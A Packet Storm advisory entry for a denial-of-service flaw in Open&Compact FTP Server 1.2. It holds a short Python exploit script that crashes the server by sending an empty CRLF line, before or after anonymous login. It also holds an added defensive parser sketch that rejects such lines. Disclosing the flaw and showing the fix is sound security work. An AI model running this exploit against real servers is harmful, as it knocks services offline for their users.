Open And Compact FTP Server 1.2 Denial Of Service

2010-06-19T00:00:00
ID PACKETSTORM:90815
Type packetstorm
Reporter Serge Gorbunov
Modified 2010-06-19T00:00:00

Description

                                        
```python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Denial Of Service
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

#!/usr/bin/python

# This exploit crashes the open ftpd server at any time simply
# by sending '\r\n' into the socket.
# You can send '\r\n' before authentication or after authentication
# and the server will always crash.
# Below are two examples of crashing the server:
# Call either crashServerBeforeAuth or crashServerAfterAuth from
# the main function.

import socket


def main():
    s.connect( ( "127.0.0.1", 21 ) )

    crashServerBeforeAuth()
    # crashServerAfterAuth()

    s.close()


def crashServerBeforeAuth():
    # Read the server banner, then send an empty command line.
    print s.recv( 512 )
    s.send( '\r\n' )


def crashServerAfterAuth():
    # Log in as anonymous first, then send the same empty command line.
    print s.recv( 512 )
    s.send('USER anonymous\r\n' )
    print s.recv( 512 )
    s.send('PASS anonymous\r\n' )
    print s.recv( 512 )

    s.send( '\r\n' )


if __name__ == "__main__":
    # Module-level socket shared by the functions above.
    s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
    main()
```
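The advisory does not say why an empty line crashes the server. As an added example (not from the advisory or the open-ftpd project), this sketch shows a control-channel line handler that answers a bare `'\r\n'` with a 500 reply both before and after login; `parse_command`, `handle_line`, `MAX_LINE` and the session dictionary are hypothetical names, and the inputs are constructed.

```python
# Added defensive example (hypothetical names; not open-ftpd code).
MAX_LINE = 512  # assumed cap on one control-channel line


def parse_command(raw):
    """Return (verb, arg) for one control-channel line, or None if malformed."""
    if len(raw) > MAX_LINE:
        return None
    try:
        line = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    line = line.rstrip("\r\n")
    if not line.strip():
        return None  # bare '\r\n': there is no verb to index or dispatch on
    verb, _, arg = line.partition(" ")
    if not verb.isalpha():
        return None
    return verb.upper(), arg


def handle_line(raw, session):
    """Map one received line to a reply string; never raises on bad input."""
    parsed = parse_command(raw)
    if parsed is None:
        return "500 Syntax error, command unrecognized."
    verb, arg = parsed
    if verb == "USER":
        session["user"] = arg
        return "331 Password required."
    if verb == "PASS":
        if "user" not in session:
            return "503 Login with USER first."
        session["authed"] = True
        return "230 Logged in."
    if not session.get("authed"):
        return "530 Please login with USER and PASS."
    return "502 Command not implemented."


if __name__ == "__main__":
    # Constructed input: the two sequences from the advisory, line by line.
    for seq in ([b"\r\n"], [b"USER anonymous\r\n", b"PASS anonymous\r\n", b"\r\n"]):
        session = {}
        for raw in seq:
            print(repr(raw), "->", handle_line(raw, session))
```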